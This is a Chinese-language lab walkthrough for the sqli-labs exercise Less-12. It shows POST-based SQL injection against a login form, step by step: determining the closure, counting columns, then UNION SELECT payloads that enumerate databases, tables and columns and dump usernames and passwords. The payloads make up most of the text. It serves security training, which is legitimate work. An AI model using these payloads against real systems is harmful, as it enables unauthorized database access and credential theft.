Less-12 post传递参数
由于是post传参,我们先用burp-suite抓包,分析报文体,获取传参过程。
得到报文体之后使用hackbar插件中的post data进行注入实验
判断闭合方式:
uname=’ or 1=1 #&passwd=&submit=Submit 登录失败
uname=") or 1=1 #&passwd=&submit=Submit 登录成功,在这里可以得知存在注入点,闭合方式为(“”)
使用order by判断字段列数:
uname=") order by 3 #&passwd=&submit=Submit 显示报错:Unknown column ‘3’ in ‘order clause’
uname=") order by 2 #&passwd=&submit=Submit 无报错,说明字段数为2
判断显示位:
(其实这里也可以不做判断,因为字段就2个,回显时也是2个信息,刚好对应上)
uname=") union select 1,2#&passwd=&submit=Submit
获取当前数据库:
uname=") union select 1,database() #&passwd=&submit=Submit
获取所有数据库名:
uname=") union select 1,(select group_concat(schema_name) from information_schema.schemata limit 0,1) #&passwd=&submit=Submit
获取security库中的表:
uname=") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ )#&passwd=&submit=Submit
获取users表中的字段
uname=") union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)#&passwd=&submit=Submit
获取username字段的信息:
uname=") union select 1,(select group_concat(username) from security.users)#&passwd=&submit=Submit
获取password字段的信息:
uname=") union select 1,(select group_concat(password) from security.users)#&passwd=&submit=Submit
将username和password连接后输出:
uname=") union select 1,(select group_concat(concat_ws(’~~’,username,password)) from security.users)#&passwd=&submit=Submit